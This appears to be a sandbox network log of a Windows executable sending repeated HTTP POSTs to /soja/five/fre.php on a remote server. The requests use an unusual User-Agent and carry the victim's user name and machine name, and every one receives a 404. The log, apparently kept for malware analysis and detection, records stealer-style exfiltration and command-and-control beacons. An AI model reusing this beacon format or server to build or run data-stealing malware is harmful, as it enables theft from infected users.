Jan 11, 2025 08:37:20.290095091 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:20.295162916 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:21.015218019 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49834	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:21.328651905 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:21.333703041 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:22.060451984 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49841	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:22.212016106 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:22.217011929 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:22.934484959 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49848	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:23.097503901 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:23.102370977 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:23.790729046 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49854	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:24.117260933 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:24.122123003 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:24.849899054 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49864	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:25.022986889 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:25.027858019 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:25.749088049 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49870	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:25.895386934 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:25.900547981 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:26.588424921 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49876	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:26.761853933 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:26.766848087 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:27.478336096 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49882	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:27.639379025 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:27.644318104 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:28.381721020 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49888	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:28.546928883 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:28.555244923 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:29.254405975 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49895	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:29.422964096 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:29.427876949 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:30.159415960 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49904	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:30.316665888 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:30.321552992 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:31.068775892 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49911	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:31.238603115 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:31.243472099 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:31.960581064 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49917	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:32.127331018 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:32.132348061 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:32.876811028 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49923	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:33.030534029 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:33.035370111 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:33.740371943 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49929	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:33.896517992 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:33.901352882 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:34.614382029 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49938	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:34.775362968 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:34.780299902 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:35.492938995 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49946	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:35.651675940 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:35.656564951 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:36.377417088 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49952	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:36.537604094 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:36.542433977 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:37.256186962 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	49958	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:37.409082890 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:37.413980961 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:38.126209974 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49964	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:38.273817062 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:38.278631926 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:39.132728100 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49972	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:39.293143034 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:39.298254967 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:39.989154100 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	49980	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
